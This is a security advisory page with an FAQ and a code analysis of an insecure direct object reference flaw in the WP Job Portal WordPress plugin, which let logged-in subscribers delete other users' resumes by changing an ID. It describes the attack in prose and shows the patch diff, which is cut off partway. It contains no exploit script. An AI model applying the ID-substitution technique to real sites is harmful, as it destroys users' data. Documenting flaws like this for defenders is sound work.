What is CVE-2026-24379?

CVE-2026-24379 is a medium severity vulnerability in the WP Job Portal plugin for WordPress, affecting versions up to and including 2.4.3. It is classified as an Insecure Direct Object Reference (IDOR), allowing authenticated users with Subscriber-level access to perform unauthorized actions by manipulating user-controlled keys.

How does this vulnerability work?

The vulnerability arises from missing validation on a user-controlled key in the resume deletion functionality. An authenticated attacker can send a request to delete a resume by altering the resume ID parameter, potentially deleting resumes owned by other users.

Who is affected by this vulnerability?

Any WordPress site using the WP Job Portal plugin version 2.4.3 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to delete resumes that do not belong to them.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WP Job Portal plugin installed. If it is version 2.4.3 or earlier, your site is at risk. You can find the version in the WordPress admin dashboard under Plugins.

How can I fix this vulnerability?

The vulnerability is patched in version 2.4.4 of the WP Job Portal plugin. To fix the issue, update the plugin to the latest version available in the WordPress plugin repository or your site’s admin dashboard.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the WP Job Portal plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to authenticated users.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it can still lead to significant issues such as unauthorized data deletion, impacting user trust and data integrity.

What are the practical implications of this vulnerability?

Successful exploitation allows attackers to delete resumes belonging to other users, leading to data loss and potential disruption for job seekers. This can affect the platform’s reliability and user confidence.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can manipulate the resume ID parameter in a request to delete a resume. It illustrates the lack of ownership checks, enabling unauthorized actions against other users’ data.

What is Insecure Direct Object Reference (IDOR)?

IDOR is a type of access control vulnerability where an attacker can access or modify objects (like files or database records) by manipulating identifiers in requests. This occurs when the application does not properly validate user permissions for the requested object.

What steps should I take after updating the plugin?

After updating to version 2.4.4, monitor your site for any unusual activity and review user permissions. It is also advisable to conduct a security audit to ensure no other vulnerabilities exist.

Can this vulnerability be exploited remotely?

Yes, this vulnerability can be exploited remotely by authenticated users who have access to the WordPress site. The attacker needs to be logged in with at least Subscriber privileges to perform the exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24379: Job Portal <= 2.4.3 – Authenticated (Subscriber+) Insecure Direct Object Reference (wp-job-portal)

CVE ID CVE-2026-24379

Plugin wp-job-portal

Severity Medium (CVSS 4.3)

CWE 639

Vulnerable Version 2.4.3

Patched Version 2.4.4

Disclosed January 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24379:
This vulnerability is an Insecure Direct Object Reference (IDOR) in the WP Job Portal plugin for WordPress, affecting versions up to and including 2.4.3. The flaw allows authenticated attackers with Subscriber-level access or higher to perform unauthorized actions by manipulating a user-controlled key. The CVSS score of 4.3 indicates a medium severity issue.

The root cause is missing validation on a user-controlled key within the resume deletion functionality. The vulnerable code resides in the `modules/resume/model.php` file, specifically in the `deleteResume` function. The function at line 4239 accepts a resume ID parameter (`$wpjobportal_resumeid`) without verifying the requesting user owns that resume. Before the patch, the function only performed a numeric check on the ID. The code then proceeds to delete the resume file from the filesystem, as shown by the call to `unlink($wpjobportal_wpdir[‘basedir’].’/’.$wpjobportal_data_directory.’/resume/’.$wpjobportal_row->photo)`. This lack of ownership validation is the core security flaw.

Exploitation requires an authenticated attacker with at least Subscriber privileges. The attacker would send a request to the resume deletion endpoint, manipulating the `id` parameter to reference a resume belonging to another user. The exact endpoint and HTTP method depend on the plugin’s routing, but the attack vector involves submitting a crafted request where the `wpjobportal_resumeid` parameter points to an unauthorized object. The payload is a simple numeric ID substitution, allowing the attacker to delete any resume by specifying its ID.

The patch adds an ownership check before allowing the deletion operation. In the patched version at line 4242, the code now calls `$this->getIfResumeOwner($wpjobportal_resumeid)` when the user is not an administrator. This function validates that the current user owns the specified resume. If the check fails, the function returns false, preventing the unauthorized deletion. The fix ensures that object references are validated against the user’s permissions, closing the IDOR vulnerability.

Successful exploitation allows an attacker to delete resumes belonging to other users. This results in data loss and potential disruption to job seekers’ profiles. The impact is limited to the resume module and does not grant full administrative access, but it violates the confidentiality and integrity of other users’ data. Attackers could target specific high-value resumes or perform mass deletions, affecting the platform’s reliability and user trust.

Differential between vulnerable and patched code

Code Diff

--- a/wp-job-portal/includes/activation.php
+++ b/wp-job-portal/includes/activation.php
@@ -468,7 +468,7 @@
               ('searchjobtag', '4', 'job', 'tag'),
               ('categories_colsperrow', '3', 'category', NULL),
               ('productcode', 'wpjobportal', 'default', NULL),
-              ('versioncode', '2.4.3', 'default', NULL),
+              ('versioncode', '2.4.4', 'default', NULL),
               ('producttype', 'free', 'default', NULL),
               ('vis_jscredits', '0', 'jscontrolpanel', 'credits'),
               ('vis_emcredits', '1', 'emcontrolpanel', NULL),
@@ -690,6 +690,8 @@
               ('resume_list_ai_filter', '0', 'resume', 'airesumesearch'),
               ('show_suggested_resumes_button', '1', 'resume', 'aisuggestedresumes'),
               ('show_suggested_resumes_dashboard', '1', 'resume', 'aisuggestedresumes'),
+              ('show_jobseeker_dashboard_invoices', '0', 'jscontrolpanel', 'credits'),
+              ('show_employer_dashboard_invoices', '0', 'emcontrolpanel', 'credits'),
               ('jobseeker_show_resume_status_section', 1, 'jobseeker', 'advanceresumebuilder')
               ;
               ";
--- a/wp-job-portal/includes/classes/resumeviewlayout.php
+++ b/wp-job-portal/includes/classes/resumeviewlayout.php
@@ -432,13 +432,15 @@
                         $wpjobportal_html .= $this->getRowForView($wpjobportal_text, $wpjobportal_value, $wpjobportal_i,$wpjobportal_themecall);
                         break;
                     case 'resumefiles':
-                        // $files_html = '';
-                        if ($wpjobportal_i % 2 != 0) { // close the div if one field is print and the function is finished;
-                            $files_html .= '</div>'; // closing div for the more option
+                        if (wpjobportal::$wpjobportal_data['resumecontactdetail'] == true) {
+                            // $files_html = '';
+                            if ($wpjobportal_i % 2 != 0) { // close the div if one field is print and the function is finished;
+                                $files_html .= '</div>'; // closing div for the more option
+                            }
+                            $wpjobportal_text = $this->getFieldTitleByField($wpjobportal_field);
+                            $files_html .= $this->getAttachmentRowForView($wpjobportal_text,$wpjobportal_themecall);
+                            $wpjobportal_i = 0;
                         }
-                        $wpjobportal_text = $this->getFieldTitleByField($wpjobportal_field);
-                        $files_html .= $this->getAttachmentRowForView($wpjobportal_text,$wpjobportal_themecall);
-                        $wpjobportal_i = 0;
                         break;
                     default:
                         if($wpjobportal_is_qucik_apply == 1){ // dont print this field for quick apply resume
--- a/wp-job-portal/includes/wpjobportal-wc.php
+++ b/wp-job-portal/includes/wpjobportal-wc.php
@@ -18,7 +18,7 @@
     if (!class_exists('WC_Product')) {
         return;
     }
-    class WPJOBPORTAL_Product_Wpjobportal_packages extends WC_Product {
+    class WC_Product_Wpjobportal_packages extends WC_Product {

         public $product_type = '';
         public function __construct($wpjobportal_product) {
@@ -28,7 +28,7 @@
         }
     }

-    class WPJOBPORTAL_Product_Wpjobportal_perlisting extends WC_Product {
+    class WC_Product_Wpjobportal_perlisting extends WC_Product {

         public function __construct($wpjobportal_product) {
             $this->product_type = 'wpjobportal_perlisting';
@@ -363,9 +363,9 @@
     }
 }
 # Fetching module --set up woocommerce
+add_action( 'woocommerce_after_checkout_billing_form', 'wpjobportal_add_custom_checkout_hidden_field' );
 add_action( 'woocommerce_after_order_notes', 'wpjobportal_add_custom_checkout_hidden_field' );
 function wpjobportal_add_custom_checkout_hidden_field( $wpjobportal_checkout ) {
-        global $woocommerce;
         $wpjobportal_moduleid = WPJOBPORTALrequest::getVar('id');
         echo '<div id="user_link_hidden_checkout_field">
                 <input type="hidden" class="input-hidden" name="billing_wpjobportal_mid" id="billing_wpjobportal_mid" value="' . esc_attr($wpjobportal_moduleid) . '">
@@ -439,8 +439,11 @@
   add_filter( 'woocommerce_order_item_name', 'wpjobportal_custom_orders_items_names', 10, 2 );
   function wpjobportal_custom_orders_items_names( $wpjobportal_item_name, $wpjobportal_item ) {
   // Only in thankyou "Order-received" page
-      $wpjobportal_id = WPJOBPORTALrequest::getVar('id');
-      $wpjobportal_name = wpjobportal::$_common->getProductDesc($wpjobportal_id);
+        $wpjobportal_id = WPJOBPORTALrequest::getVar('id');
+        $wpjobportal_name = wpjobportal::$_common->getProductDesc($wpjobportal_id);
+        if(empty($wpjobportal_name)){
+            return $wpjobportal_item_name;
+        }
     //$wpjobportal_name = $wpjobportal_id;
       if(is_wc_endpoint_url( 'order-received' ))
     # Specific Item Name For a Product
--- a/wp-job-portal/modules/common/model.php
+++ b/wp-job-portal/modules/common/model.php
@@ -1078,7 +1078,13 @@

     function getProductDesc($wpjobportal_id){
         $wpjobportal_name = '';
+        if(empty($wpjobportal_id)){
+            return $wpjobportal_name;
+        }
         $parse = wpjobportalphplib::wpJP_explode('-', $wpjobportal_id);
+        if(empty($parse[0])){
+            return $wpjobportal_name;
+        }
         $wpjobportal_moduleid = $parse[1];
         $wpjobportal_configname = $parse[0];
         if(is_array($parse) && !empty($parse)){
--- a/wp-job-portal/modules/company/model.php
+++ b/wp-job-portal/modules/company/model.php
@@ -1095,7 +1095,7 @@
                     return false;
                 }
                 # Package Filter's
-                $wpjobportal_package = apply_filters('wpjobportal_addons_userpackages_perfeaturemodule',false,$wpjobportal_packageid,'remcompanycontactdetail');
+                $wpjobportal_package = apply_filters('wpjobportal_addons_userpackages_perfeaturemodule',false,$wpjobportal_packageid,'remcompanycontactdetail',$wpjobportal_uid);
                 if($wpjobportal_package && !$wpjobportal_package->expired && ($wpjobportal_package->companycontactdetail==-1 || $wpjobportal_package->remcompanycontactdetail)){ //-1 = unlimited
                     #Data For Featured Company Member
                     $wpjobportal_data['uid'] = $wpjobportal_uid;
--- a/wp-job-portal/modules/company/tmpl/form-fields.php
+++ b/wp-job-portal/modules/company/tmpl/form-fields.php
@@ -6,9 +6,16 @@
  * @param inputprefix  prefix to concat with input name and id - optional
  * @param fields       company fields - optional
  */
+$wpjobportal_email = '';
 if (!isset($wpjobportal_company) && !wpjobportal::$_common->wpjp_isadmin()) {
 	$wpjobportal_company = null;
-    $wpjobportal_email = $wpjobportal_userinfo->emailaddress;
+    if(!empty($wpjobportal_userinfo) && !empty($wpjobportal_userinfo->emailaddress)){
+        $wpjobportal_email = $wpjobportal_userinfo->emailaddress;
+    }
+    if(!empty($userinfo) && !empty($userinfo->emailaddress)){
+        $wpjobportal_email = $userinfo->emailaddress;
+    }
+
 }else{
     $wpjobportal_email = '';
 }
--- a/wp-job-portal/modules/configuration/tmpl/admin_configurations.php
+++ b/wp-job-portal/modules/configuration/tmpl/admin_configurations.php
@@ -306,6 +306,7 @@
                     ['id' => 'temp_employer_dashboard_applied_resume', 'label' => __('Show Applied Resumes', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['temp_employer_dashboard_applied_resume'], 'tooltip' => __('Setting to show the applied resumes section', 'wp-job-portal'), 'options' => $wpjobportal_options_showhide],
                     //['id' => 'temp_employer_dashboard_saved_search', 'label' => __('Show Saved Searches', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['temp_employer_dashboard_saved_search'], 'tooltip' => __('Setting to show the saved searches section', 'wp-job-portal'), 'options' => $wpjobportal_options_showhide],
                     //['id' => 'temp_employer_dashboard_newest_resume', 'label' => __('Show Newest Resumes', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['temp_employer_dashboard_newest_resume'], 'tooltip' => __('Setting to show the newest resumes section', 'wp-job-portal'), 'options' => $wpjobportal_options_showhide],
+                    ['id' => 'show_employer_dashboard_invoices', 'label' => __('Show Employer Dashboard Invoices', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['show_employer_dashboard_invoices'], 'tooltip' => __("Show Invoices on the employer's dashboard", 'wp-job-portal'), 'options' => $wpjobportal_options_showhide , 'pro' => ['slug' => 'credits', 'name' => __('Credits', 'wp-job-portal')]],
                 ]
             ],
             'dashboard_links' => [
@@ -364,6 +365,7 @@
                     //['id' => 'temp_jobseeker_dashboard_shortlisted_jobs', 'label' => __('Show Shortlisted Jobs', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['temp_jobseeker_dashboard_shortlisted_jobs'], 'tooltip' => __('Setting to show the shortlisted jobs section', 'wp-job-portal'), 'options' => $wpjobportal_options_showhide, 'pro' => ['slug' => 'shortlist', 'name' => __('Shortlist', 'wp-job-portal')]],
                     ['id' => 'temp_jobseeker_dashboard_newest_jobs', 'label' => __('Show Newest Jobs', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['temp_jobseeker_dashboard_newest_jobs'], 'tooltip' => __('Setting to show the newest jobs section', 'wp-job-portal'), 'options' => $wpjobportal_options_showhide],
                     ['id' => 'jsactivejobs_graph', 'label' => __('Show Active Jobs Graph for Job Seeker', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['jsactivejobs_graph'], 'tooltip' => __("Show a graph of job statistics in the job seeker's dashboard", 'wp-job-portal'), 'options' => $wpjobportal_options_showhide],
+                    ['id' => 'show_jobseeker_dashboard_invoices', 'label' => __('Show Job Seeker Dashboard Invoices', 'wp-job-portal'), 'type' => 'toggle', 'value' => wpjobportal::$_data[0]['show_jobseeker_dashboard_invoices'], 'tooltip' => __("Show Invoices on the job seeker's dashboard", 'wp-job-portal'), 'options' => $wpjobportal_options_showhide , 'pro' => ['slug' => 'credits', 'name' => __('Credits', 'wp-job-portal')]],
                 ]
             ],
             'dashboard_links' => [
--- a/wp-job-portal/modules/job/model.php
+++ b/wp-job-portal/modules/job/model.php
@@ -904,15 +904,18 @@
         //die('abc');
         $this->sorting();
         //filters
-        $wpjobportal_searchtitle = wpjobportal::$_search['jobs']['searchtitle'];
-        $wpjobportal_searchcompany = wpjobportal::$_search['jobs']['searchcompany'];
-        $wpjobportal_searchjobcategory = wpjobportal::$_search['jobs']['searchjobcategory'];
-        $wpjobportal_searchjobtype = wpjobportal::$_search['jobs']['searchjobtype'];
-        $wpjobportal_status = wpjobportal::$_search['jobs']['status'];
-        $featured = wpjobportal::$_search['jobs']['featured'];
-        $wpjobportal_datestart = wpjobportal::$_search['jobs']['datestart'];
-        $wpjobportal_dateend = wpjobportal::$_search['jobs']['dateend'];
-        $location = wpjobportal::$_search['jobs']['location'];
+
+        $jobs_search = isset(wpjobportal::$_search['jobs']) ? wpjobportal::$_search['jobs'] : [];
+
+        $wpjobportal_searchtitle = isset($jobs_search['searchtitle']) ? $jobs_search['searchtitle'] : null;
+        $wpjobportal_searchcompany = isset($jobs_search['searchcompany']) ? $jobs_search['searchcompany'] : null;
+        $wpjobportal_searchjobcategory = isset($jobs_search['searchjobcategory']) ? $jobs_search['searchjobcategory'] : null;
+        $wpjobportal_searchjobtype = isset($jobs_search['searchjobtype']) ? $jobs_search['searchjobtype'] : null;
+        $wpjobportal_status = isset($jobs_search['status']) ? $jobs_search['status'] : null;
+        $featured = isset($jobs_search['featured']) ? $jobs_search['featured'] : null;
+        $wpjobportal_datestart = isset($jobs_search['datestart'])  ? $jobs_search['datestart'] : null;
+        $wpjobportal_dateend = isset($jobs_search['dateend']) ? $jobs_search['dateend'] : null;
+        $location = isset($jobs_search['location']) ? $jobs_search['location'] : null;

         wpjobportal::$_data['filter']['searchtitle'] = $wpjobportal_searchtitle;
         wpjobportal::$_data['filter']['searchcompany'] = $wpjobportal_searchcompany;
@@ -1125,7 +1128,7 @@
                     #Per listing --Free job Expiry date
                     $wpjobportal_expiry = wpjobportal::$_config->getConfigValue('jobexpiry_days_free');
                     if(isset($wpjobportal_data['stoppublishing']) && empty($wpjobportal_data['stoppublishing'])){
-                        $wpjobportal_data['stoppublishing'] = gmdate($wpjobportal_dateformat,strtotime($wpjobportal_data['startpublishing'].'+'.$wpjobportal_expiry.' days') );
+                        $wpjobportal_data['stoppublishing'] = gmdate($wpjobportal_dateformat,strtotime($wpjobportal_data['stoppublishing'].'+'.$wpjobportal_expiry.' days') );
                     }
                     if (!wpjobportal::$_common->wpjp_isadmin()) {
                         $wpjobportal_data['status'] = wpjobportal::$_config->getConfigurationByConfigName('jobautoapprove');
@@ -1134,7 +1137,7 @@
                     #Per listing --Free job Expiry date
                     $wpjobportal_expiry = wpjobportal::$_config->getConfigValue('jobexpiry_days_perlisting');
                     if(isset($wpjobportal_data['stoppublishing']) && empty($wpjobportal_data['stoppublishing'])){
-                        $wpjobportal_data['stoppublishing'] = gmdate($wpjobportal_dateformat,strtotime($wpjobportal_data['startpublishing'].'+'.$wpjobportal_expiry.' days') );
+                        $wpjobportal_data['stoppublishing'] = gmdate($wpjobportal_dateformat,strtotime($wpjobportal_data['stoppublishing'].'+'.$wpjobportal_expiry.' days') );
                     }
                     if (!wpjobportal::$_common->wpjp_isadmin()) {
                         // in case of per listing submission mode
--- a/wp-job-portal/modules/job/tmpl/addjob.inc.php
+++ b/wp-job-portal/modules/job/tmpl/addjob.inc.php
@@ -648,6 +648,17 @@
                     }
                 }
             });
+// terms and conditions check for elegent design
+            jQuery('form#wpjobportal-form').submit(function (e) {
+                var termsandcondtions = jQuery('div.wjportal-elegant-addon-terms-and-conditions-wrap').attr('data-wpjobportal-terms-and-conditions');
+                if(termsandcondtions == 1){
+                    if(!jQuery('input[name="termsconditions"]').is(':checked')){
+                        alert(common.terms_conditions);
+                        return false;
+                    }
+                }
+            });
+

         });
         function getotherexp(id){
--- a/wp-job-portal/modules/job/tmpl/viewjob.inc.php
+++ b/wp-job-portal/modules/job/tmpl/viewjob.inc.php
@@ -209,7 +209,7 @@
                         var myOptions = {
                             zoom: zoom,
                             center: latlng,
-                            scrollwheel: false,
+                            scrollwheel: true,
                             mapTypeId: google.maps.MapTypeId.ROADMAP
                         };
                         map = new google.maps.Map(document.getElementById('map_container'), myOptions);
@@ -223,7 +223,7 @@
                         var myOptions = {
                             zoom: zoom,
                             center: latlng,
-                            scrollwheel: false,
+                            scrollwheel: true,
                             mapTypeId: google.maps.MapTypeId.ROADMAP
                         };
                         map = new google.maps.Map(document.getElementById('map_container'), myOptions);
--- a/wp-job-portal/modules/quickapply/model.php
+++ b/wp-job-portal/modules/quickapply/model.php
@@ -417,9 +417,9 @@

         $wpjobportal_resume_data = array();

-        $wpjobportal_resume_data['first_name'] = $wpjobportal_data['full_name'];
-        $wpjobportal_resume_data['email_address'] = $wpjobportal_data['email'];
-        $wpjobportal_resume_data['cell'] = $wpjobportal_data['phone'];
+        $wpjobportal_resume_data['first_name'] = !empty($wpjobportal_data['full_name']) ? $wpjobportal_data['full_name'] : '';
+        $wpjobportal_resume_data['email_address'] = !empty($wpjobportal_data['email']) ? $wpjobportal_data['email'] : '';
+        $wpjobportal_resume_data['cell'] = !empty($wpjobportal_data['phone']) ? $wpjobportal_data['phone'] : '';
         $wpjobportal_resume_data['created'] = gmdate('Y-m-d H:i:s');
         $wpjobportal_resume_data['last_modified'] = gmdate('Y-m-d H:i:s');
         $wpjobportal_resume_data['status'] = 1;
--- a/wp-job-portal/modules/resume/model.php
+++ b/wp-job-portal/modules/resume/model.php
@@ -3295,7 +3295,7 @@
                 #Membershipe Code for Featured Resume
                 $wpjobportal_packageid = WPJOBPORTALrequest::getVar('wpjobportal_packageid');
                 # Package Filter's
-                $wpjobportal_package = apply_filters('wpjobportal_addons_userpackages_perfeaturemodule',false,$wpjobportal_packageid,'remresumecontactdetail');
+                $wpjobportal_package = apply_filters('wpjobportal_addons_userpackages_perfeaturemodule',false,$wpjobportal_packageid,'remresumecontactdetail',$wpjobportal_uid);
                 if($wpjobportal_package && !$wpjobportal_package->expired && ($wpjobportal_package->resumecontactdetail==-1 || $wpjobportal_package->resumecontactdetail)){ //-1 = unlimited
                     #Data For Featured Company Member
                     $wpjobportal_data['uid'] = $wpjobportal_uid;
@@ -4239,6 +4239,11 @@
         if(!is_numeric($wpjobportal_resumeid)){
             return false;
         }
+		if(!wpjobportal::$_common->wpjp_isadmin()){
+            if(!$this->getIfResumeOwner($wpjobportal_resumeid)){
+                return false;
+            }
+        }
         $wpjobportal_row = WPJOBPORTALincluder::getJSTable('resume');
         $wpjobportal_data_directory = wpjobportal::$_config->getConfigValue('data_directory');
         $wpjobportal_wpdir = wp_upload_dir();
--- a/wp-job-portal/modules/state/tmpl/views/detail.php
+++ b/wp-job-portal/modules/state/tmpl/views/detail.php
@@ -22,11 +22,11 @@

     <td>
         <?php if ($wpjobportal_row->enabled == '1') { ?>
-	        <a href="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_state&task=unpublish&action=wpjobportaltask&wpjobportal-cb[]='.$wpjobportal_row->id.$wpjobportal_pageid)),'wpjobportal_state_nonce'); ?>" title="<?php echo esc_attr(__('published', 'wp-job-portal')); ?>">
+	        <a href="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_state&task=unpublish&action=wpjobportaltask&wpjobportal-cb[]='.$wpjobportal_row->id.$wpjobportal_pageid),'wpjobportal_state_nonce')); ?>" title="<?php echo esc_attr(__('published', 'wp-job-portal')); ?>">
 	            <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/control_panel/dashboard/good.png" border="0" alt="<?php echo esc_attr(__('published', 'wp-job-portal')); ?>" />
 	        </a>
        <?php } else { ?>
-	        <a href="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_state&task=publish&action=wpjobportaltask&wpjobportal-cb[]='.$wpjobportal_row->id.$wpjobportal_pageid)),'wpjobportal_state_nonce'); ?>" title="<?php echo esc_attr(__('not published', 'wp-job-portal')); ?>">
+	        <a href="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_state&task=publish&action=wpjobportaltask&wpjobportal-cb[]='.$wpjobportal_row->id.$wpjobportal_pageid),'wpjobportal_state_nonce')); ?>" title="<?php echo esc_attr(__('not published', 'wp-job-portal')); ?>">
 	            <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/control_panel/dashboard/close.png" border="0" alt="<?php echo esc_attr(__('not published', 'wp-job-portal')); ?>" />
 	        </a>
 		<?php } ?>
--- a/wp-job-portal/modules/theme/tmpl/admin_themes.php
+++ b/wp-job-portal/modules/theme/tmpl/admin_themes.php
@@ -1,25 +1,21 @@
 <?php
-    if (!defined('ABSPATH'))
-        die('Restricted Access');
-    wp_enqueue_script('iris');
-    wp_enqueue_style('wpjobportal-style', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/theme-interface.css');
-    // wp_enqueue_style('wpjobportal-style', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/style.css');
-    // wp_enqueue_style('wpjobportal-style', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/style_mobile.css');
-    // wp_enqueue_style('wpjobportal-style', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/style_landscape.css');
-    // wp_enqueue_style('wpjobportal-style', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/style_tablet.css');
-    if (is_rtl()) {
-        // wp_register_style('wpjobportal-style-rtl', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/stylertl.css');
-        // wp_enqueue_style('wpjobportal-style-rtl');
-    }
-    //include_once WPJOBPORTAL_PLUGIN_PATH . 'includes/css/style_color.php';
-    // wp_enqueue_style('wpjobportal-color', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/color.css');
+if (!defined('ABSPATH'))
+    die('Restricted Access');
+wp_enqueue_script('iris');
+$rand = random_int(1,999);
+wp_enqueue_style('wpjobportal-style1', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/theme-interface.css');
+wp_enqueue_style('wpjobportal-style2', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/style.css?f_ignore_cache='.$rand);

+if (is_rtl()) {
+    wp_register_style('wpjobportal-style-rtl', esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/css/stylertl.css');
+    wp_enqueue_style('wpjobportal-style-rtl');
+}
 ?>
 <!-- main wrapper -->
 <div id="wpjobportaladmin-wrapper">
     <!-- left menu -->
     <div id="wpjobportaladmin-leftmenu">
-        <?php  WPJOBPORTALincluder::getClassesInclude('wpjobportaladminsidemenu'); ?>
+        <?php WPJOBPORTALincluder::getClassesInclude('wpjobportaladminsidemenu'); ?>
     </div>
     <div id="wpjobportaladmin-data">
         <!-- top bar -->
@@ -28,22 +24,24 @@
                 <div id="wpjobportal-breadcrumbs">
                     <ul>
                         <li>
-                            <a href="<?php echo esc_url_raw(admin_url('admin.php?page=wpjobportal')); ?>" title="<?php echo esc_attr(__('dashboard','wp-job-portal')); ?>">
-                                <?php echo esc_html(__('Dashboard','wp-job-portal')); ?>
+                            <a href="<?php echo esc_url_raw(admin_url('admin.php?page=wpjobportal')); ?>"
+                                title="<?php echo esc_attr(__('dashboard', 'wp-job-portal')); ?>">
+                                <?php echo esc_html(__('Dashboard', 'wp-job-portal')); ?>
                             </a>
                         </li>
-                        <li><?php echo esc_html(__('Colors','wp-job-portal')); ?></li>
+                        <li><?php echo esc_html(__('Colors', 'wp-job-portal')); ?></li>
                     </ul>
                 </div>
             </div>
             <div id="wpjobportal-wrapper-top-right">
                 <div id="wpjobportal-config-btn">
-                    <a href="admin.php?page=wpjobportal_configuration" title="<?php echo esc_attr(__('configuration','wp-job-portal')); ?>">
+                    <a href="admin.php?page=wpjobportal_configuration"
+                        title="<?php echo esc_attr(__('configuration', 'wp-job-portal')); ?>">
                         <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/control_panel/dashboard/config.png">
-                   </a>
+                    </a>
                 </div>
                 <div id="wpjobportal-vers-txt">
-                    <?php echo esc_html(__('Version','wp-job-portal')).': '; ?>
+                    <?php echo esc_html(__('Version', 'wp-job-portal')) . ': '; ?>
                     <span class="wpjobportal-ver"><?php echo esc_html(WPJOBPORTALincluder::getJSModel('configuration')->getConfigValue('versioncode')); ?></span>
                 </div>
             </div>
@@ -53,23 +51,127 @@
             <h1 class="wpjobportal-head-text">
                 <?php echo esc_html(__('Colors', 'wp-job-portal')); ?>
             </h1>
-            <a class="wpjobportal-add-link button" id="saveColors" href="#" title="<?php echo  esc_attr(__('add job','wp-job-portal'))?>">
-                <?php echo  esc_html(__('Save Colors','wp-job-portal'))?>
-            </a>
-            <a href="#" id="preset_theme" class="wpjobportal-add-link white-bg button" title="<?php echo  esc_attr(__('preset','wp-job-portal'))?>">
-                <?php echo esc_html(__('Preset', 'wp-job-portal')); ?>
-            </a>
         </div>
         <!-- page content -->
-        <div id="wpjobportal-admin-wrapper" class="p0">
+        <div id="wpjobportal-admin-wrapper" class="p0 wpjobportal-admin-themepge-wrapper">
             <div id="theme_heading">
-                <form action="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_theme&task=savetheme&action=task'),'wpjobportal_theme_nonce')); ?>" method="POST" name="adminForm" id="adminForm">
+                <div class="js_themes_presets">
+                    <div class="wp-section-title">
+                        <div class="wp-icon-box-txt-wrp">
+                            <div class="wp-icon-box">
+                                <svg xmlns="http://www.w3.org/2000/svg" width="18" height="24" viewBox="0 0 24 24"
+                                    fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
+                                    stroke-linejoin="round" data-lucide="swatch-book" class="lucide lucide-swatch-book">
+                                    <path d="M11 17a4 4 0 0 1-8 0V5a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2Z"></path>
+                                    <path d="M16.7 13H19a2 2 0 0 1 2 2v4a2 2 0 0 1-2 2H7"></path>
+                                    <path d="M 7 17h.01"></path>
+                                    <path
+                                        d="m11 8 2.3-2.3a2.4 2.4 0 0 1 3.404.004L18.6 7.6a2.4 2.4 0 0 1 .026 3.434L9.9 19.8">
+                                    </path>
+                                </svg>
+                            </div>
+                            <h2><?php echo esc_html(__('Presets', 'wp-job-portal')); ?></h2>
+                        </div>
+
+                        <span class="wpjb-box-styles"> 8 <?php echo esc_html(__('Styles', 'wp-job-portal')); ?></span>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#36bc9a;"></div>
+                            <div class="color 2" style="background:#333333;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#" class="set_theme"><?php echo esc_html(__('Teal Slate', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#e43039;"></div>
+                            <div class="color 2" style="background:#940007;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#" class="set_theme"><?php echo esc_html(__('Ruby Red', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#3baeda;"></div>
+                            <div class="color 2" style="background:#333333;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#" class="set_theme"><?php echo esc_html(__('Ocean Cyan', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#4d89dc;"></div>
+                            <div class="color 2" style="background:#000000;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#"
+                                class="set_theme"><?php echo esc_html(__('Royal Azure', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#8cc051;"></div>
+                            <div class="color 2" style="background:#366600;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#"
